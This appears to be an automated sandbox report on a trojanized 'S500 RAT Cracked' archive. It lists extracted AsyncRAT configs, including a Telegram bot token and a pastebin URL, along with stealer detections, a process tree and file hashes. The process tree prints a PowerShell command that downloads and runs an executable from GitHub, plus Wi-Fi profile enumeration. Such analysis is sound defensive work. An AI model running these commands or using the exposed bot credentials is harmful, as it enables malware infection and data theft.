Analysis
-
max time kernel
164s -
max time network
169s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
-
submitted
30-03-2024 13:53
General
-
Target
S500 RAT Cracked + Source .rar
-
Size
147.7MB
-
MD5
5a39139ce5f13297aea9c5839d1447c6
-
SHA1
90c68a4f451c2fe75c6325198693b6f52971d573
-
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
-
SHA512
7a98ebd2ffb9dec789ddf5adf9fe2dad5a9527cb2e2c038933722012a9ead3fac98280dbf32f0ef5aaa4b6c57afe7768cdd2018e632fbe415c56925833e536b1
-
SSDEEP
3145728:Lp+2zwG6H0uXZ2nlHp75eJmivGPIpVQNQSsnyDZ5lc:Ls2cG1FlHp7ImqO8VIGyba
Malware Config
Extracted
asyncrat
Venom Pwn3rzs' Edtition v6.0.1
Default
oevtobrbpcmpahavl
-
delay
1
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/LwwcrLg4
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops desktop.ini file(s) 8 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile3⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr All3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid3⤵
-
-
-
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
-
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exeServerRegistrationManager.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe3⤵
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
4KB
MD50cfc72d4b2ba7e01d8fd978431f377a7
SHA1595abcdfdc505f461a2092c17b5dc4b6b78253b9
SHA2564b6f8aba628f8446e11d058f196723227c01a0d278996dc50cd580be9f3567f3
SHA51272d1b0265fdd09c1a008eb6350222af53a166fd7c0ee7795d0d0a6fc6bd84d32bc185873951fd885e2588c6af9c6e6b4897364119002ef1e1b8fa6ce42ea9858
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
1KB
MD5fc4af7384f0b6f274dd3e745f0aceeaa
SHA131b310f869b15b84e52ef282cabaee974e5043cf
SHA256f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
142KB
MD59c43f77cb7cff27cb47ed67babe3eda5
SHA1b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7
-
Filesize
801B
MD5feb8d2de1663adc1e141b8f7bb95d6ac
SHA1a9b1c4d0f522515c940a80876876d782510cb421
SHA256ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b
SHA512af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3
-
Filesize
1KB
MD5e6fad395145548f21929c4050a70d710
SHA197a8780b8a3d25185f83f88c5f320384b4069601
SHA256c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92
SHA512857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799
-
Filesize
3KB
MD51efa2056cd994a29fd0d2e983ef7b26e
SHA176967624574c43b1e22e9b3ec4ba17139b547633
SHA2561e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d
SHA512edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2
-
Filesize
1KB
MD578f905ea7378410c450c79ceb3b9012b
SHA1495f677fd305c78a77e8164f7de7d732e1aca35c
SHA25650156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a
SHA512ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5
-
Filesize
505B
MD5f7bbcdd86cbc1d6d0b81720ac1477fde
SHA14799c37f86be4dda105ed3468934f70c36339474
SHA25650f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f
SHA5122a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2
-
Filesize
445B
MD5963be96779d4ef26360c2a3af3a53816
SHA16991959998c9939e5ededa0d6759a715559c2140
SHA256f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4
SHA5124525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0
-
Filesize
105B
MD5e9f329a48dcb70c6ad95c8ab8fe82eb0
SHA145e25355e67fd2d528467b4117884ffb601552a3
SHA2565dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637
SHA51262648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4
-
Filesize
3KB
MD5be38b0526e6d40f44c7b62d8db2c9553
SHA15c4c70ae1381b5e51a685f96700340832229c06d
SHA256f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA51277ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac
-
Filesize
1KB
MD5e03eaf459f028cc6fa8669e277c1a17a
SHA1ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA51217efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d
-
Filesize
2KB
MD5a54153cd522d951f6b360c3bd3de84d0
SHA1639dbc414f495044c2d705f39ac965212f1c8c30
SHA256195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa
SHA51295e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3
-
Filesize
4KB
MD5c60e527a85f285ddc66c2fcf160b1be7
SHA1abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA25635c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA51277a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e
-
Filesize
1.9MB
MD50f07705bd42d86d77dab085c42775244
SHA17e4b5c367183f4753a8d610e353c458c3def3888
SHA256cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0
-
Filesize
1.1MB
MD587ca06f69c513f4fbbf67c5b4e366210
SHA17a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA25642b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb
-
Filesize
70B
MD5d5b77dfb5f248f3aabc560d8300088c5
SHA1bbf7bb5f78051a59e725920cea3d54d1e7473cea
SHA256113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55
SHA512180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552
-
Filesize
427B
MD5531208ea558a68c95339bea9517845c3
SHA195865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA51246f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3
-
Filesize
175KB
MD5604f8eb4afe0d9a9e3fb5f7981c09145
SHA192d44f43b4c9fc84b99ba34c5abb3672725ecc69
SHA256682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d
SHA512cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598
-
Filesize
18.0MB
MD55b52658c4517684971de10a6b7a67c30
SHA1f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA2563ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6
-
Filesize
16.7MB
MD5aa2fc72b58059e5e7e9e7003ab466322
SHA1e171576589134431baccb40d308e7dcbc776e087
SHA256f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA51226d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef
-
Filesize
221KB
MD517cbdd9e4cb0ede2fad8c08c05fdaa84
SHA174bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA5121948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a
-
Filesize
2.2MB
MD5af527b22b92a23c38a492c5961cf2643
SHA115106adfa13415287b3e9d8deba21df53cb92eda
SHA2564208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c
-
Filesize
19KB
MD53aaae3cec15b86693ae9fb8e1507c872
SHA1ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463
-
Filesize
472KB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.2MB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
9.9MB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
16.8MB
-
Filesize
64KB
-
Filesize
200KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
48KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
240KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.9MB
-
Filesize
156KB
-
Filesize
1.2MB
-
Filesize
9.9MB
-
Filesize
1024KB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.2MB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
40KB
-
Filesize
5.0MB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
200KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
228KB
-
Filesize
228KB
-
Filesize
228KB